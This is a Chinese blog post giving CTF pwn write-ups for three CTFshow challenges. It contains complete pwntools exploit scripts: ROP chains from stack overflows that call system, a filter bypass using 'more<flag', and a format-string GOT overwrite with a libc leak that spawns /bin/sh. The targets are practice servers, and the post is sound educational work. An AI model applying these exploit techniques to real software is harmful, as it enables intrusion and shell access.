PWN-PRACTICE-CTFSHOW-5

最新推荐文章于 2024-04-15 21:10:33 发布
最新推荐文章于 2024-04-15 21:10:33 发布
阅读量406 收藏
点赞数
分类专栏: Pwn-CTFSHOW 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122523319
版权

PWN-PRACTICE-CTFSHOW-5

BJDCTF2020-router

在这里插入图片描述

36D杯-签到

栈溢出,用ROPgadget找到一个"sh"字符串,ROP,程序过滤了cat和空格,more<flag绕过即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28041)
elf=ELF("./pwn1")

system=elf.plt["system"]
sh=0x601040
pop_rdi=0x4006d3
ret=0x4004ce

payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(sh)+p64(ret)+p64(system)
io.sendline(payload)

io.sendline("more<flag")

io.interactive()

36D杯-babyFmtstr

格式化字符串漏洞
1、改写memset的got为main函数地址,重复利用格式化字符串漏洞
2、利用格式化字符串漏洞,泄露libc,得到system真实地址
3、改写printf的got为system真实地址
4、输入/bin/sh\x00

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28041)
elf=ELF("./pwn1")

#gdb.attach(io,"b * 0x400D81")
#pause()

#改写memset的got为main函数地址
memset_got=elf.got["memset"] 
main_addr=0x400E93
payload="%3731c"+"%10$hnaaaa"+p64(memset_got)
io.sendlineafter("please input name:\n",payload)

#泄漏libc
puts_got=elf.got["puts"]
payload="%9$saaaa"+p64(puts_got)
io.sendlineafter("please input name:\n",payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x06f690
system=libc_base+0x045390
print("system=="+hex(system))

#改写printf的got为system真实地址
printf_got=elf.got["printf"]
def set_printf_to_system(system):
	printf_got_addr=printf_got
	x = system & 0xffffffff
	a = x & 0xffff
	a1 = printf_got_addr
	b = (x>>16) & 0xffff
	b1=printf_got_addr+2
	if(a>b):
		tmp=a
		a=b
		b=tmp
		tmp=a1
		a1=b1
		b1=tmp
	s="%"+str(a)+"c"
	s+="%12$hn"
	s+="%"+str(b-a)+"c"
	s+="%13$hn"
	for i in range(32-len(s)):
		s+='a'
	s+=p64(a1)
	s+=p64(b1)
	return s

payload=set_printf_to_system(system)
io.sendlineafter("please input name:\n",payload)

#输入/bin/sh
io.sendlineafter("please input name:\n","/bin/sh\x00")

#pause()

io.interactive()

36D杯-MagicString

栈溢出,利用look_here函数将字符串"ti"变为"sh",再ROP执行system("/bin/sh\x00")即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28137)
elf=ELF("./pwn1")

main_addr=0x400661
system=elf.plt["system"]
look_here=0x40062D
ti=0x60104d
binsh=0x601048
pop_rdi=0x400733
ret=0x4004d1

io.recvuntil("a girlfriend!\n")
payload="a"*0x2a0+"b"*8+p64(pop_rdi)+p64(ti)+p64(look_here)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUUCTF - PWNPWN5
古月浪子的博客
03-27 478
checksec一下 IDA打开看看,发现格式化字符串漏洞 那么思路很简单,先找偏移,然后通过格式化字符串漏洞任意地址写来更改unk_804c044的值 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambd...
ctfshow pwn5
qq_39980610的博客
08-22 230
很明显的栈溢出ret2text。
CTFshow-PWN-前置基础-pwn5
最新发布
Welcome To Myon'Blog !
04-15 1066
x86 处理器是小端序,即将一个多位数的低位放在较小的地址处,高位放在较大的地址处,小端序与人类的阅读习惯相反,但更符合计算机读取内存的方式,因为CPU读取内存中的数据时,是从低地址向高地址方向进行读取的,因此这里应该是 Welc。使用 nasm 命令对该汇编文件进行编译,指定输出格式为 ELF 格式,这种格式是一种在 UNIX 系统中广泛使用的可执行文件格式,它包含了程序的二进制代码、数据、符号表等信息。: 这是要链接的输入文件,是由汇编器生成的对象文件,它包含了汇编代码的已编译二进制表示。
pwn05(应对简单栈溢出的常规套路)
Welcome To Myon'Blog !
07-07 481
一、常规检查(nc、file、checksec) 二、IDA反编译,只找两个东西即可 1、寻找造成栈溢出的函数的地址到ebp的距离 2、寻找我们所要利用的函数的地址(即我们希望程序最后返回到哪里) 三、编写并运行exp脚本
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1169
CTFshow-pwn入门-前置基础-pwn5-pwn12
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-200题目文件
02-16
pwn-200题目文件
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9465
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFSHOW 36DCTF(pwn部分wp)
weixin_44296844的博客
05-04 1766
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
[ctf.show.reverse] 36D 签到
weixin_52640415的博客
04-19 496
36D一共4个逆向,难度差太远。 签到这个最简单。由于删除了符号表,所以上来就得先猜函数。 int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rcx int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] int v8; // [rsp+Ch] [rb
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1702
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5935
文章目录pwn入门pwn签到pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1688
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
[ctf.show] baby 左左右右
weixin_52640415的博客
06-16 275
根据p^q爆破p,q
ctf.show命令执行(web29-web124)
wanan的博客
08-31 5201
ctf.show命令执行(web29-web124)
CTFShow-36D 2020 pwn
清霂的博客
04-24 274
目录pwn0PWN_MagicString pwn0 #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "pwn0" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) pop_rdi_addr=0x00000000004006d3 sys_addr=0x0000000000
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值